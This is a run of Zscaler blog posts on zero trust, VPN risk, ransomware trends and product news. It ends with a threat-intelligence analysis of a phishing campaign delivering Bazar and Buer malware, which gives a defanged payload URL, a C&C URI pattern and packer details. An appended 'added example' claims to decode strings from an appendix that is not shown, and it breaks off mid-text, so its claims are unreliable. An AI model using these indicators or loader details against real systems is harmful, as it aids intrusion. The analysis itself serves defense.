- "Birds of a Feather" networking events, including the Women in IT Exchange, featuring Jody Davids, former PepsiCo SVP and Global CIO, who'll share her personal experience leading IT for some of the world's biggest consumer brands.
- Breakout sessions with content focused on the Zscaler solution foundations, the Zscaler Zero Trust Exchange platform, the secure access service edge (SASE) model, network transformation, security transformation, data protection, digital experience, and more.
- Voice of the Customer CXO main stage sessions with enterprise IT leaders driving their organizations’ secure digital transformations.
- Insightful customer stories from IT leaders at Carrier, Takeda Pharmaceuticals, Stanley Black & Decker, Siemens, and many more.
- Virtual Showcases where you can demo the latest cloud technology from Zscaler and Zscaler partners.

Digital transformation is a team sport, and Zenith Live 2020 is geared toward collaboration. You can expect plenty of opportunities for peer engagement, some surprise guests (!), and practical advice from experts who have fully negotiated the journey you are now on. We'll visit with astronaut Scott Kelly, who will offer teamwork guidance based on his time on the ISS. And WIRED senior writer and author of "Sandworm" Andy Greenberg will join Zscaler's Lisa Lorenzin to talk about the latest trends in cybersecurity. Check out the agenda here.

At this year's Zscaler cloud summit, every seat is in the front row.
I hope you can join us virtually in December for Zenith Live 2020, the free Zscaler Cloud Summit December 8–10, 2020. Register now.

Dr. Amit Sinha is President and CTO of Zscaler.

Dr. Amit Sinha

VPNs: The Biggest Threat to Your Industrial Control System

Is zero trust access the answer to the growing problem of VPN access to industrial control systems? I think so, and I’m not the only one.

What makes VPNs dangerous

Virtual private networks (VPNs) are used to extend network connectivity between users and applications or industrial control systems (ICSs). So it is a natural progression for IT to propose the use of VPNs to enable third-party access to an organization’s ICS. In many cases, the operational technology (OT) or ICS vendors themselves started deploying VPNs to gain remote access to these systems. With remote access, the OT team’s goal is to reduce downtime for the production lines. But VPNs have failed to deliver on that promise as they have become the primary source of unplanned downtime. Let’s take a look at some of the problems with VPNs.

Flat network: By design, VPNs create bidirectional tunnels between two networks, but inbound traffic flows are the source of all things bad. To make things worse, many ICS systems allow IP multicast and IP broadcast communication to ensure the supervisory control and data acquisition (SCADA) or programmable logic controller (PLC) software can discover all the OT devices over the VPN. In many cases, the VPN connects to a jump box on the IT network, which is actually bridging the OT network directly to the third party. This level of network access to third parties defeats the very goal of achieving an air gap between OT and IT. ICS systems communicate in clear text over EtherNet/IP and do not require any form of authentication.
But design and configuration software for discrete, process, batch, motion, safety, and drive-based applications was not designed for remote access over VPN and lacks security controls commonly found in IT application software. With third-party users using the same laptop to connect to their office network, home network, and many other companies, the attack surface becomes significantly larger.

Vulnerabilities: It seems as if every VPN vendor on the planet has disclosed severe vulnerabilities in its VPN appliances. For OT system owners, this means VPNs are the favorite targets for attackers to gain unauthorized access and inject ransomware into your OT network. Also, VPNs require DDoS protection since they are accessible to anyone on the internet at all times.

“Emerging threats such as ransomware attacks on business processes, potential siegeware attacks on building management systems, GPS spoofing and continuing OT/IOT system vulnerabilities straddle the cyber-physical world.” – Top 9 Security and Risk Trends for 2020, Gartner, September 2020

Ransomware: VPNs put users’ devices onto your OT network. Ransomware typically propagates over the network, infecting other computers connected to it. OT presents a target-rich environment with many workstations on the OT network running older versions of a Windows operating system (OS). There are several instances where ransomware from a third-party user connected over VPN led to massive disruption in the OT network. Ransomware attacks originating on the IT network and spreading to the OT systems have occurred at multiple organizations, including Norwegian aluminum producer Norsk Hydro, resulting in damages exceeding $1 billion.

Unpatchable systems: Most OT systems use an older version of Windows or purpose-built software that has reached end-of-life or end-of-support. Regularly patching OT systems, irrespective of the underlying OS, is not an option due to the lengthy and cumbersome approval process required by OT vendors.
There have been well-documented cases of patches applied to OT systems that have resulted in complete system malfunction. In 2017, a security patch shut down monitoring equipment in a large NASA engineering oven, resulting in a fire that destroyed spacecraft hardware. Unpatchable systems or delayed patching is a major vulnerability that is often exploited by attackers.

Do third-party users really need network access?

It is time to stop bringing users, especially third parties, onto your network when they only need access to the OT systems to perform remote maintenance. The network-centric VPN-based approach, including DMZs and firewalls, has been in use since the Purdue Model for ICS became the standard for OT security in the late 1990s. Instead, the right approach is to connect users to applications.

A zero trust approach is a better way to let third parties access the specific systems they need without allowing any inbound connections to your OT network, even with OT-IT convergence. That’s because this concept does not suggest connecting the networks; rather, it just means that users should be able to access OT systems in a secure and convenient manner. Keeping OT systems known and accessible over the internet only for authorized users eliminates the biggest attack surface and reduces the risk of ransomware or cyberattacks.

Find out how MAN Energy, Johnson Controls, TT Electronics, and MOWI have taken a zero trust approach and are connecting users to applications without bringing them on the network.

Deepak Patel is the senior director of OT network and security transformation at Zscaler.
Deepak Patel

ZPA and CrowdStrike: What This New Device Health Integration Means for You

Summary:
- Zscaler and CrowdStrike announced a new device health integration
- Device health score will be used to automatically update ZPA access policies
- Joint customers of ZPA and CrowdStrike ZTA can leverage it

Adopting a zero trust model is highly sought after and much talked about—especially in the context of remote work. A majority of the workforce is now remote, accelerating security concerns for devices and connectivity.

Image: Microsoft

The world is evolving and embracing a combination of remote and on-premises workers, so security measures must also adapt to enable this new normal. In order to obtain end-to-end security and protect data, it is imperative to understand device posture and user identity to enable secure access to applications. These components must be continuously assessed to identify attack risks and prevent expensive reactive measures. Device posture is not a one-time consideration; it needs to be monitored on an ongoing basis, and this information must be passed along to the zero trust service responsible for providing secure access to applications.

Zero trust with Zscaler and CrowdStrike through endpoint posture assessment

Zscaler and CrowdStrike have partnered to deliver secure access to applications by providing conditional access based on the user’s identity, location, and the posture of the device. With the announcement of this new integration between ZPA and CrowdStrike Zero Trust Assessment, the Zscaler and CrowdStrike partnership has grown even deeper. CrowdStrike provides a health score for each device, and then surfaces it as a continuous stream of posture assessments. These scores provide ZPA with an enhanced understanding of device posture, allowing ZPA to leverage this information, auto-update policies, and decide whether to allow access to a private app or block the device from access.

What does this integration mean for customers?
Joint ZPA and CrowdStrike ZTA customers will be able to:

- Use device health metrics for a deeper understanding of the device posture
- Isolate devices to prevent malware propagation before they connect to apps
- Automate updates to access policies based on APIs from CrowdStrike to ZPA
- Ensure that only compliant devices gain access to sensitive data
- Increase visibility with stronger reporting and remediation

Through our conversations with customers, we know that zero trust is an important aspect of this journey, especially with helping your organization move beyond crisis mode with legacy software to a sustainable and modern, long-term solution. True zero trust equates to having device and user identity awareness and the right policies enforced. This new integration is a huge step in that direction.

Learn more:
- Video: Zscaler + CrowdStrike Demo
- Customer Testimonial: Cushman & Wakefield

Kanishka Pandit is a product marketing manager for Zscaler Private Access.

Kanishka Pandit

A Crowning Achievement: Cyber Security Essentials Certification in the UK

The National Cyber Security Centre (NCSC) is on a mission to make the UK the safest place to live and work online. I’m excited to say that Zscaler has joined the NCSC’s effort by attaining the organization’s Cyber Security Essentials certification in the UK. This certification is the latest achievement in Zscaler’s compliance expansion initiative that the company is pursuing in support of partners and customers around the world.

Zscaler serves many organizations across the UK and partners closely with BT Group. The NCSC certification enables us to be a provider on the Commercial Crown Services contract supporting UK government agencies.
The NCSC has served as a single resource for government agencies, companies of all sizes, and the general public to help them protect themselves from a range of cyberattacks, and it works with law enforcement, defense companies, the UK’s intelligence and security agencies, and international partners. In 2014, the NCSC established its Cyber Essentials certification, and, since October of that year, the certification has been required for suppliers to UK government agencies that handle certain types of sensitive and personal information.

Every organization today faces the risk of a cyberattack—no one is immune. But government agencies carry a particular burden as they must protect sensitive data that constituents are required to provide. Furthermore, any downtime as a result of a breach can disrupt the delivery of critical services, such as law enforcement or healthcare. Earlier this year, INTERPOL reported that attackers were targeting hospitals already stretched thin in the fight against COVID-19: “Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage; preventing them from accessing vital files and systems until a ransom is paid.” Attacks against state and local governments in the U.S. increased by 50 percent in 2020, according to GCN.

The good news is that many governments are taking the lead in modernizing IT by shifting their applications and infrastructures to the cloud, which has the added benefit of enhancing security. Zscaler was created for this world in which applications have moved out of the data center and users have moved off the trusted network. By sending user traffic through the Zscaler Zero Trust Exchange, the world’s largest security platform built for the cloud, agencies can reduce cyber risk and significantly improve the user experience for their employees connecting from home—and anywhere.
Zscaler ensures that millions of employees at thousands of enterprise and government organizations worldwide are protected against cyberattacks and data breaches. Each organization faces unique regulatory challenges based upon industry, geography, and other factors, and the Zscaler platform is designed to simplify compliance and reporting, globally. Zscaler is also committed to ensuring that our global customers and partners are able to meet diverse compliance and global privacy requirements, including those defined by GDPR, CCPA, PIPEDA, and many more.

Zscaler meets a range of compliance requirements:
- Service Organization Control (SOC) 2, Type II, in accordance with the American Institute of Certified Public Accountants’ applicable Trust Services Principles and Criteria.
- FedRAMP High certification at multiple levels that meet the requirements of federal government agencies, including civilian, DoD, and intelligence organizations.
- FIPS 140-2: Federal Information Processing Standard that meets NIST requirements for cryptographic modules.
- CSA STAR: Cloud Security Alliance Gold-level Security, Trust & Assurance Registry (STAR) Level 2 Certification.
- ISO 27701 certification assures that Zscaler services are based on internationally recognized best practices for information security management systems.
- ISO 27018 focuses on the protection of personal data in the cloud.
- Criminal Justice Information Services (CJIS) compliance ensures the protection of information as required by the Criminal Justice Information Services Security Policy.
- Information Security Registered Assessors Program (IRAP) ensures that appropriate controls are in place for addressing the requirements of the Australian government Information Security Manual (ISM) produced by the Australian Cyber Security Centre (ACSC).

Learn more at

Stephen R. Kovac is the Zscaler Vice President of Global Government and Compliance.

Ransomware’s Pivot: A Business School Case Study

There are very few technology companies that successfully pivot their business strategy to adapt to a macro paradigm shift. A classic case study in adapting to changing market conditions is the Netflix video streaming service. Home video rentals evolved from local mom-and-pop video rental stores, to chains like Blockbuster and Hollywood Video, to DVDs-by-mail from Netflix, and finally to digital streaming. Today there are scores of streaming services, but of all of them, Netflix was the only one to successfully pivot from physical discs to digital streaming. It took incredible vision and, based on the company’s market cap, it was clearly the right move at the right time.

Malware has undergone an evolution similar to that of video rental services. Programmers created the first viruses and worms primarily motivated by academic reasons or bragging rights. There was very little financial incentive to attack systems other than to cause mayhem. State-level hacking was always driven by espionage and sabotage. Credit card theft involved too much risk for those trying to sell the card numbers and eventually cash out. The financial motivation for hacking did not explode until the dawn of ransomware.

Around 2015, a new strain of malware began to rear its ugly head when people's files started getting encrypted, leaving only a direct message behind: pay us a fee or your data is gone forever. There was a particular attraction to this attack method over stealing credit card numbers. The hackers would receive direct payments, often in the form of untraceable cryptocurrency like Bitcoin, in exchange for the decryption key. This model cut out the middleman and also instilled urgency in the victim to pay.
The ransom demand would often increase significantly after a specified period, and the attackers would delete the decryption key after too much time had passed, rendering the files permanently unrecoverable. Holding files hostage in exchange for money worked surprisingly well for several years. In 2019, over 100 cities and municipalities got hit with ransomware, resulting in hundreds of millions of dollars paid out in ransom. However, in the never-ending cat-and-mouse game between security researchers and hackers, ransomware attacks only get worse; they never get better. New requirements for organizations to get cybersecurity insurance, improve user-awareness training, and enhance security controls make it more difficult for ransomware gangs to infect organizations and extract ransom payments.

In a brilliant business decision, ransomware gangs decided to change tactics and not only encrypt a victim organization's files but also steal the data and threaten to expose it. Stealing the data before encrypting it pressures organizations to pay the ransom, and to pay higher amounts, but it also serves as an insurance policy with which to embarrass or expose organizations that choose not to pay. There have been several high-profile breaches in which the organizations decided not to pay the ransom demand and instead were able to recover their systems from recent backups. That did not prevent the attackers from releasing highly confidential information from their high-profile victims. The attackers’ hope is that the next victim will pay the ransom rather than suffer the loss of business reputation that results from a data breach.

This past summer, the first known instance surfaced of an organization successfully stopping a ransomware attack but still having to pay the ransom. In a statement posted to its website, the company admitted that unknown attackers breached its systems and attempted to execute a ransomware attack.
Security controls and a robust incident response plan stopped the ransomware before it could run. This would typically be a happy ending to an IT security story. Still, the company’s disclosure explains that the attackers first exfiltrated customer data from its servers before attempting to launch the ransomware attack. The robust security controls and incident response plans worked brilliantly to detect and block the ransomware attack but were powerless to stop the data theft. As a result, the company paid the attackers an unspecified ransom in exchange for a promise to destroy the data and refrain from selling it.

Mike Tyson famously said that everyone has a brilliant plan until they get punched in the face. The company in this case had planned for the inevitable ransomware attack against its network, but it failed to realize that it would still be on the hook to pay a ransom to prevent the exposure of any data stolen in the attack.

Proxy not passthrough

Because today’s ransomware attacks are uniquely crafted for each target, every business targeted with ransomware effectively becomes a new patient zero. Sandboxing approaches that do not operate inline are becoming increasingly useless: the first new unknown file will always be missed, and the typical sandbox can’t hold it for proper analysis. When considering options to improve your ransomware protection, look to an inline proxy approach to sandboxing: Zscaler Cloud Sandbox. A proxy allows security teams to apply game-changing “quarantine” to inbound unknown files. These new unknown files can be held and fully analyzed before delivery, a vast improvement over traditional sandbox “passthrough” approaches that allow the first file to reach its target and create the dreaded patient zero. It’s also vital that you perform full SSL inspection on ALL your traffic, so threats have nowhere to hide.
Packaging all this up in a cloud-delivered platform guarantees that you can scale SSL inspection without capacity limitations and follow users on and off the network for airtight coverage. Learn about Zscaler Ransomware Protection.

Chris Louie, CISSP, is a sales engineer at Zscaler.

Six Steps for Effective Public-Sector Cloud Adoption in a Post-COVID World

Throughout Australia and New Zealand, governments and public-sector bodies are facing significant challenges caused by the rapid impact of technology. New work patterns are replacing those that have been in place for years, which, in turn, is changing the way services are delivered. The pace of this change has increased further in the wake of the COVID-19 pandemic. Most staff are now required to work remotely, and operations have had to be redesigned to make them less office-centric.

One significant shift has been an increase in the use of cloud platforms. The public sector was already coming to understand the performance and cost benefits of using hosted resources. Now COVID-related pressures are accelerating the shift from legacy, on-premises systems to cloud-based alternatives.

The importance of effective cybersecurity

Current operating conditions are far from normal, and there’s an understanding that things may never return to precisely the way they were before the virus appeared. Governments need to continue to assess the way they operate so they can be best positioned to deliver services in the new world in which they now have to operate. They must also ensure that trusted connectivity is in place. Data and applications need to be accessible by those who require them from wherever they happen to be, and this must be done securely. To achieve this, there are six critical steps Australian and New Zealand government agencies need to take. These steps are:

1. Embrace effective management. Governments and agencies at all levels must become leading champions of enterprise security risk management. This role has to include the three areas of cybersecurity, physical security, and personnel security.

2. Private-sector parity. Governments and agencies that have a role in providing essential services should be required to meet the same cybersecurity standards as privately owned critical infrastructure. This includes having in place increased levels of accountability and oversight.

3. Decommission legacy systems. As part of the ongoing adoption and broader use of cloud-based services, governments should follow a strategy of decommissioning vulnerable legacy IT infrastructure. This process needs to be well-planned, disciplined, monitored, and accountable.

4. Adopt zero trust. To radically improve cybersecurity, governments must embrace the Zero Trust Network Architecture (ZTNA) specified by analyst firm Gartner. This removes the concept of a network perimeter and ensures all applications and data stores are protected regardless of where they are located. All agencies can then use a consistent set of cloud-delivered security services that can be tailored to suit their particular requirements.

5. Combine forces. Rather than each agency selecting and deploying its own cloud resources, many could come together and take advantage of providers who can support multiple agencies as individual tenants. The portfolio of services available in this way includes secure web gateway services, remote access and zero trust application connectivity, identity management, email, and endpoint protection. Governments should make a clear vendor or service selection at all levels of the security stack, while minimising the selection and procurement hurdles.

6. Observe guidance. In Australia, governments and agencies should ensure they adopt the Australian Cyber Security Centre’s guidance on using the Information Security Registered Assessors Program (IRAP). This process provides a better level of technical audit than ISO 27001 and ensures the quality and fit of selected cybersecurity products and services.

Following these steps will ensure Australia and New Zealand’s public sector will be best placed to deal with the new post-COVID environment that will continue to emerge in coming months. By securely embracing the cloud, they will be much better positioned to deliver the services that business and the public require. However, achieving this requires more than just investing in technology. There also has to be a shift in mindset. All those involved will need to think and act differently in response to what will be very different operating conditions. A failure to do this could lead to more strategies and more funding not delivering the benefits that are possible. By taking the time to map out comprehensive strategies and ensure they are aligned with the new ways of working now in place, Australian and New Zealand governments can ensure they’re able to operate efficiently and effectively as the country heads along the road to recovery.

Download our comprehensive ebook, Securing Remote Work, to see how organizations around the world are safeguarding business continuity in the work-from-anywhere era.

Budd Ilic is the Zscaler country manager for Australia and New Zealand.

Zscaler is an Innovator Sponsor at the ONUG Fall 2020 Virtual Conference

The way employees work has changed dramatically in the past year as the world has had to quickly adopt work-from-home technologies for the sake of user productivity and business operations. While this has given employees the freedom to access data from practically anywhere, it also brings a host of challenges when it comes to mitigating business risk. These issues will be a central theme during the ONUG Fall 2020 Virtual Conference, which is why we are pleased to be an Innovator Sponsor this year. We hope to see you there!
Before COVID-19, it was easier to get by with a traditional "castle and moat" approach to security. Now, with many organizations moving to a fully remote workforce, there is a need for security to follow users off of the corporate network. Moreover, we are witnessing a swift deconstruction of private data centers and the acceleration of enterprise cloud adoption. Therefore, today's businesses must adopt and deploy a cloud-delivered and scalable security solution.

Zscaler provides cloud-delivered security and access services to ensure that businesses can operate under any conditions, at any scale, with employees anywhere in the world and on any device. The key is that a cloud-delivered service remains inline, securing all connections between users and the applications necessary to keep the business running smoothly. The Zscaler Zero Trust Exchange platform delivers secure, seamless access to the internet and cloud apps (Zscaler Internet Access) or private apps in the data center or public and private clouds (Zscaler Private Access). Access is based on software-defined business policies that follow users no matter where they connect or what devices they’re using. With more than 150 globally distributed data centers, security is brought as close to the user as possible for fast access no matter where users connect.

You can hear a lot more at the ONUG Fall 2020 Virtual Conference, October 14-15, 2020. We look forward to sharing with the ONUG Community and Conference attendees how Zscaler helps organizations move away from legacy security technologies that were not built for today’s workforce and enables secure and efficient work-from-anywhere experiences. Here are all the ways you can learn about Zscaler during the conference:

Zscaler Keynote Address: October 15 at 1:50 PM ET
Accelerating Your Secure Digital Transformation. The cloud and mobility are powerful enablers of digital transformation, but many IT organizations are grappling with legacy architectures and processes that haven't evolved much in decades. When applications lived in the data center and users were connected to the network, it made sense to invest in a hub-and-spoke architecture and to protect it with a castle-and-moat security perimeter. But these models prevent organizations from taking full advantage of the agility, productivity, efficiency, and speed enabled by digital transformation. Network and security architectures must evolve to meet business needs in the new era. In this session, Zscaler CEO Jay Chaudhry talks with Craig Williams, CIO of Ciena, about their experiences as they led the evolution from the old world to the new, with insights into the challenges they overcame on their successful transformation journeys.

Panel Discussion: October 14 at 3:55 PM ET
Great Debate: Remote Workforce Infrastructure, On-Prem, or Cloud-Based? Join this session to hear from experts in the field, including Larry Biagini, former VP & CTO at GE and now Zscaler Chief Technology Evangelist, about the role of on- and off-prem remote workforce infrastructure options and choices.

Zscaler Proof of Concept: October 14 at 1:30 PM ET
This Proof of Concept is also being shown in the Zscaler virtual booth over the course of the two-day virtual event.

Zscaler Open Session: October 15 at 11:25 AM ET
Enabling Enterprise Digital Transformation – Illustrated. You’ve probably been hearing a lot about digital business transformation, but has anyone talked to you about what it means for your organization? Why does it matter? What does it entail, and how do you start? In this video whiteboarding session, you’ll have the chance to hear from Zscaler's Solution Architect, Brian Deitch, about the drivers of digital transformation, get answers to your questions, and learn how to take the first steps—or the next steps—on your journey. The session will cover a range of topics, including the Gartner SASE framework, SD-WAN, the changing branch architecture, IT simplification and cost reduction, the need to support work-from-home initiatives, the benefits of cloud-native security that supports secure, any-to-any connectivity, and more.

We look forward to seeing you at the event; be sure to register today using Zscaler’s exclusive free passcode.

Andrea Smith is a Sr. Field Marketing Manager at Zscaler.

When Technology Isn’t the Problem: The Psychology of IT Transformation

This post was originally published on LinkedIn on September 16, 2020.

Enterprises transform network architectures to become more agile and better able to meet business goals. But transitioning your network from a traditional hub-and-spoke network to a cloud services model can be a daunting task. Transformation leaders (like you) must address connectivity, management, performance, cost, and ROI concerns. But the more difficult enterprise network transformation obstacles are often overlooked. The most important question you should ask before embarking on a cloud transformation journey isn’t about security. It’s about people, and how open they are to change. Many C-level leaders neglect to ask, “Is the IT team adequately prepared for our transformation journey?” Digital transformations are more likely to succeed when champions recognize at the outset that the biggest challenge to transformation strategy isn’t technical.

What if you build it and they don’t come?

The new way of work dictates a new model of connectivity: the internet is the new network, and the cloud is the new data center. Change is rarely easy, and for IT organizations accustomed to (and certified in) the old way of doing things—e.g., perimeter hardware-based security encircling a hub-and-spoke network—the shift to the cloud can be difficult (and disorienting).
IT teams beholden to legacy architectures build complex moats to protect the corporate assets within the metaphorical castle. But their legacy architectures can’t support your enterprise’s need for agility, performance, scalability, and, most importantly, growth. It doesn’t matter how good the drawbridge may be if no one (except maybe threat actors) wants to enter the castle. Your crucial company assets, applications, and services have already moved to the cloud. Users perform the bulk of their work on the open internet, outside the corporate network perimeter and the purview of IT oversight. Meanwhile, IT teams worry about losing control of network access or security, and inviting a breach. They seek to reconcile differences between cloud provider and enterprise security posture.

The problem here isn’t the technology. It’s that IT culture is averse to change. IT teams (particularly those with skill sets and certifications linked to legacy hardware) can be reluctant to embrace digital transformation: Will cloud deployment impact their job security? Will current skill sets lose value? Will team priorities change? And these concerns are understandable. As a transformation leader, you have a dual responsibility to lead digital transformation and ensure no one gets left behind.

How to win friends and influence IT teams

IT leaders must ensure everyone is excited about (and committed to) advancing company transformation and security. That requires giving them a reason to embrace change. Yes, it can mean IT roles evolve—but this evolution means IT gets to advance core business competencies and goals instead of hindering them with legacy architecture. This makes your IT department an enterprise value accelerator, instead of a brake pedal. Ensuring digital transformation success requires more than evangelism to IT stakeholders. It requires engagement. Here are four places to begin with your team:

1. Solve a business challenge with transformation technology. Let your team get a transformation win, because nothing breeds success like...success:
- Find an ongoing business issue that technical innovation can solve.
- Create an IT team task force to address that issue.
- Ensure the mandate is clear: solve this problem without regard to what the company currently uses in the network architecture. Use what best makes sense from a simplicity and agility point of view.
- Assess any new technologies or solutions that can solve that business problem. Don’t pigeonhole team creativity by tying success to a budget or TCO.
- When they find a solution that addresses the business problem, ensure that it is acknowledged and promote their solution at the executive level.

2. Demonstrate how IT can become the department of “yes.” Make the “to do” list work for you (and knock a few items off it for a change):
- Clearly outline a list of projects sitting on the back burner due to a lack of resources or legacy technology incompatibility.
- Assess and communicate the business value of the projects to your IT team.
- Challenge them to be a catalyst for change so that they focus on future objectives instead of “keeping the lights on.”

3. Make continuing education easy. IT team members often worry, “What will I do if I’m not needed to build on-premises solutions?” Education is a constant catalyst and should be part of each staff member’s growth plan: if there is no growth, there’s no advancement.
- Outline the expectations for every team member, including how they fit into the transformation planning, and provide access to the training they need to accomplish those goals.
- Offer multiple options: onsite lectures, online training, in-class lessons, and cross-departmental training (including a buddy/mentor environment).

4. Build individual brands. Remind IT team members that the world is moving forward and that to remain valuable in their careers, they’ll need to roll with it. The experience they get shepherding transformation will build their resumes and their brands, making them more valuable in the enterprise.

Transformation: a technological and human issue

For cloud-enabled enterprises, the present and future are perimeter-less cloud security. IT can’t cling to legacy architectures but must instead enable business goals. This means creating an agile, resilient network that can adapt to change. Digital transformation needs executive leadership. To do that successfully, you must get IT colleagues excited about embracing a new vision and being an enabler of the new future of the business. Assure them that they have an active place in network transformation if they are willing to think differently about their role and how they contribute to achieving the business’ goals. Regardless of what they do, everyone should understand the organization’s goals and their role in its future and success.

Pamela Kubiatowski is Sr. Director of Transformation Strategy at Zscaler.

An Introduction to Zero Trust Network Access

Zero trust is more important now than ever before. With a newly mobile workforce, an increased urgency for cloud, and an increase in phishing and ransomware attacks, zero trust has become the next critical step in digital transformation for many. In fact, according to a recent survey conducted by Microsoft, 51 percent of business leaders are accelerating their zero trust deployment, while 91 percent of companies report that they are in the process of deploying zero trust. While the term “zero trust” has become well known, many are unfamiliar with the technology that powers the zero trust model that businesses strive to achieve. This is where zero trust network access (ZTNA) comes in.

What is ZTNA?

Zero trust network access (ZTNA), also known as a software-defined perimeter (SDP), is the technology that enables the secure connections behind a true zero trust model.
Gartner defines ZTNA as a technology that “provides controlled access to resources, reducing the surface area for attack. The isolation afforded by ZTNA improves connectivity, removing the need to directly expose applications to the internet. The internet becomes an untrusted transport and access to applications occurs through an intermediary. The intermediary can be a cloud service controlled by a third-party provider or a self-hosted service.” – Gartner, Market Guide to Zero Trust Network Access, June 2020

But what does this mean for the business? Most importantly, it means that businesses no longer have to choose between upholding security standards and delivering a fast access experience for their users. The most popular ZTNA solutions are global cloud-delivered services that bring access as close to the user as possible, regardless of their location or device. As a result, many are switching from legacy VPN infrastructure to cloud-delivered ZTNA services.

How is ZTNA unique?

While many vendors claim to achieve zero trust, ZTNA is differentiated from other technologies in four critical areas.

1. Users are NEVER placed on the network. Unlike technologies such as VPN, ZTNA completely isolates the act of providing application access from network access. This isolation reduces risk by keeping potentially infected devices from entering the corporate network and only grants application access to authorized users.

2. Internal apps are completely invisible. ZTNA keeps both applications and infrastructure invisible to the internet by only initiating outbound connections. Unlike a VPN, which makes its location known to users, ZTNA never exposes IPs to the internet, making the network dark to unwanted users and internet-based attacks.

3. Lateral movement is eliminated. ZTNA makes connections between an authorized user and a specific application on a one-to-one basis. That means IT can granularly and tactically eliminate lateral movement on the network or between applications by simply enforcing business policies. App segmentation is a native ability of ZTNA, which eliminates the need to perform network segmentation.

4. The internet is used as a secure means of connectivity. ZTNA takes a user-to-application approach rather than a network-centric approach to security. The network becomes deemphasized and the internet becomes the new corporate network, leveraging end-to-end encrypted TLS micro-tunnels and dramatically reducing the need for costly MPLS links.

The ultimate benefit of ZTNA

While there are many benefits to ZTNA, they all revolve around two important concepts: security and simplification. ZTNA makes IT’s life easier by eliminating headaches caused by traditional remote access technologies. With ZTNA, IT can have confidence knowing that their organization is secured with the highest level of zero trust access while users effortlessly connect to internal apps, allowing business to run as normal regardless of user location. IT doesn’t need to choose between providing security or offering a good user experience. You can achieve both, but it takes the right technology.

Learn more about how ZTNA has led to the success of these business executives. Read these 3 top CxO stories.

More resources:
- Free Attack Surface Analysis
- What is Zero Trust?
- What is Zero Trust Network Access?
- Gartner Market Guide for Zero Trust Network Access

Camilla Ahlquist is a product marketing specialist at Zscaler.

Spear Phishing Campaign Delivers Buer and Bazar Malware

Zscaler ThreatLabZ became aware of a prevalent phishing campaign targeting employees of various organizations. During the past couple of weeks, many enterprise users have been getting spear phishing emails indicating that their employment with the company has been terminated.
These emails contain a Google Docs link that ultimately leads to the Bazar backdoor, a tool of the TrickBot gang. What is interesting is that this campaign also delivered the Buer loader, the first time we have seen these two malware families used together. The TrickBot gang's use of the Buer loader comes as no surprise, as the group is known to work with other malware operators; in the past it has also worked with other botnets, such as Emotet.

Campaign

In this email campaign, instead of relying on attachments, the attackers included links to what appeared to be a legitimate Google Docs document, which itself contained links to malicious files hosted on Google Drive or, in some cases, elsewhere. In some previous phishing campaigns, the attackers distributed the initial emails through SendGrid so that the Google Drive links in the documents sat behind a SendGrid URL, a way to bypass traditional defences. Samples of the emails we have seen are shown in Figure 1 and Figure 2.

Figure 1: One of the spear phishing email templates targeting an employee.

Figure 2: Another spear phishing email template.

The link in both emails is a Google Docs link claiming to host a PDF file with a list of employees that have been terminated, as shown in Figure 3.

Figure 3: The link to the fake Google Doc containing the download link.

The link in the Google Doc redirects to the URL unitedyfl[.]com/print_preview.exe to download the malware payload. Although the use of the target's name and an urgent, action-forcing theme is not new for this group, there has been a significant uptick in the number of emails received, and this campaign has been persistently active for the past few weeks.

Packer

In most cases, the payload that is downloaded is the Bazar malware, but in some cases it is the Buer loader. The packer used for both payloads is identical. Most notably, the packed binaries are EXE files with a randomly named export function. The export function is responsible for payload decryption and injection. First, a shellcode is decrypted, which in turn decrypts a headerless PE loader that carries the final payload in its overlay. The headerless loader allocates memory, maps the payload into it with the proper section permissions, and finally transfers control to it. In this campaign, no process self-injection is used to load the payload.

Figure 4: The decrypted headerless PE loader.

Figure 5: The payload embedded at the end of the loader.

Bazar loader and Bazar backdoor

The Bazar backdoor is a new, stealthy piece of malware that is part of the TrickBot group's arsenal and is used against high-value targets. The Bazar loader downloads and executes the Bazar backdoor on the target system. The backdoor's purpose is to execute binaries, scripts and modules, kill processes, and then remove itself from the compromised machine. The samples used in this campaign rely heavily on control-flow obfuscation. A detailed analysis report about this backdoor can be found here.

The Bazar loader downloads the Bazar backdoor from the C&C using the following URI format, where \d{3} is a three-digit number:

{C&C}/api/v\d{3}

The downloaded payload is XOR-encrypted with a repeating key and can be decrypted using the script provided in the appendix. The downloaded malware was successfully captured by the Zscaler Cloud Sandbox.

Figure 6: The Zscaler Cloud Sandbox report.

The Bazar backdoor's C&C communications use TLS, with certificates created in the same manner as TrickBot's certificates. The C&C server's TLS certificate is shown in Figure 7.

Figure 7: The Bazar/TrickBot TLS certificate.

Researchers also observed that, some time after the infection, the backdoor downloads and executes the Cobalt Strike penetration testing and post-exploitation toolkit on the victim's machine. The deployment of Cobalt Strike makes clear that this stealthy backdoor is used to gain a foothold in corporate networks so that ransomware can be deployed, data can be stolen, or network access can be sold to other threat actors.

Buer loader

The Buer loader was first discovered around the end of 2019. It is a capable loader written in C and sold primarily on Russian underground forums for around US$400. Notably, the malware does not run on systems in the CIS (Commonwealth of Independent States). Most of its important strings are encrypted and its APIs are resolved by hash, as in most sophisticated malware today. We will not go into the technical details here because a detailed analysis has already been published. The Buer loader was captured by the Zscaler Cloud Sandbox.

Figure 8: The Zscaler Cloud Sandbox report for the Buer loader.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators at various levels:

Win32.Trojan.Buerloader
Win32.Backdoor.Bazar

Conclusion

The TrickBot group has been running similarly themed campaigns for some time. The targeted nature of the campaign, with subject lines carrying the organization's name, makes these campaigns far more effective than generic spray-and-pray attacks. But even these specially crafted attacks are not immune to a pair of vigilant eyes and the right set of tools. We at Zscaler ThreatLabZ are always on the lookout for bad stuff, be it for our company or for our customers, to provide protection against it. Last but not least, always be attentive when opening email links or attachments. If there is even a tiny bit of suspicion, verify the email or have it reviewed thoroughly by your security team before proceeding.
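As an added example (not code from the original post or from Zscaler), the following script decodes the obfuscated Buer loader strings listed under "Buer strings" in the appendix below. The post lists those strings but does not say how they are encoded. Reading them side by side suggests single-byte character shifts, and that inference checks out against the post's own indicators: shifting "myyux?44659379=3=83684" back by five yields https://104.248.83.13/, the Buer C&C address given under IOCs, while shifting the "Lr..." strings forward by two yields NtAllocateVirtualMemory, NtGetContextThread, NtSetContextThread and the rest of the API set a process-hollowing loader resolves (compare T1055.012 in the ATT&CK table). The shift search, its bounds and the list of expected plaintext prefixes are assumptions of this example.

```python
"""Decode the shifted Buer loader strings from the appendix.

Added example; not code from the original post or from Zscaler. The post
lists the strings without saying how they are obfuscated. Reading them side
by side suggests single-byte character shifts, and that inference is
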